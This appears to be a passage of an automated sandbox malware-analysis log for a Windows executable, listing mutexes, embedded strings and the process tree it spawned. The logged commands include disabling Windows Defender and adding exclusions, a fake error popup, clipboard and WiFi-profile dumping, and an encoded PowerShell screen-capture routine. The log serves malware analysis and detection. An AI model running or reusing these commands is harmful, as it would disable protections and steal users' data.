              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8208:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8416:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1168:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8236:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7592:120:WilError_03
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeMutant created: \Sessions\1\BaseNamedObjects\i
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7412:120:WilError_03
              Source: C:\Users\user\AppData\Local\Temp\bound.exeMutant created: \Sessions\1\BaseNamedObjects\trksyln-TMACRO
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2504:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8016:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9092:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8588:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8424:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8984:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5776:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8996:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7228:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7804:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4080:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3120:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7612:120:WilError_03
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75162Jump to behavior
              Source: El9HaBFrFM.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exeFile read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: El9HaBFrFM.exe, 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: El9HaBFrFM.exe, El9HaBFrFM.exe, 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: El9HaBFrFM.exe, El9HaBFrFM.exe, 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: El9HaBFrFM.exe, El9HaBFrFM.exe, 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: El9HaBFrFM.exe, El9HaBFrFM.exe, 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: El9HaBFrFM.exe, El9HaBFrFM.exe, 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: El9HaBFrFM.exe, El9HaBFrFM.exe, 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: El9HaBFrFM.exeReversingLabs: Detection: 52%
              Source: El9HaBFrFM.exeString found in binary or memory: set-addPolicy
              Source: El9HaBFrFM.exeString found in binary or memory: id-cmc-addExtensions
              Source: El9HaBFrFM.exeString found in binary or memory: --help
              Source: El9HaBFrFM.exeString found in binary or memory: --help
              Source: El9HaBFrFM.exeString found in binary or memory: can't send non-None value to a just-started async generator
              Source: El9HaBFrFM.exeString found in binary or memory: can't send non-None value to a just-started generator
              Source: El9HaBFrFM.exeString found in binary or memory: fma($module, x, y, z, /) -- Fused multiply-add operation. Compute (x * y) + z with a single round.
              Source: El9HaBFrFM.exeString found in binary or memory: various kinds of output. Setting it to 0 deactivates this behavior. PYTHON_HISTORY : the location of a .python_history file. These variables have equivalent command-line options (see --help for details): PYTHON_CPU_COUNT: override the retu
              Source: El9HaBFrFM.exeString found in binary or memory: various kinds of output. Setting it to 0 deactivates this behavior. PYTHON_HISTORY : the location of a .python_history file. These variables have equivalent command-line options (see --help for details): PYTHON_CPU_COUNT: override the retu
              Source: El9HaBFrFM.exeString found in binary or memory: can't send non-None value to a just-started coroutine
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeFile read: C:\Users\user\Desktop\El9HaBFrFM.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\El9HaBFrFM.exe "C:\Users\user\Desktop\El9HaBFrFM.exe"
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Users\user\Desktop\El9HaBFrFM.exe "C:\Users\user\Desktop\El9HaBFrFM.exe"
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\El9HaBFrFM.exe'"
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "start bound.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('couldn\x22t run, poor connection try again later.', 0, 'Connection Fail', 0+16);close()""
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\El9HaBFrFM.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('couldn\x22t run, poor connection try again later.', 0, 'Connection Fail', 0+16);close()"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\bound.exe bound.exe
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://www.trksyln.net/tgmacro/download
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4mvljvuo\4mvljvuo.cmdline"
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1896,i,17984460610350237661,2584867532713279060,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
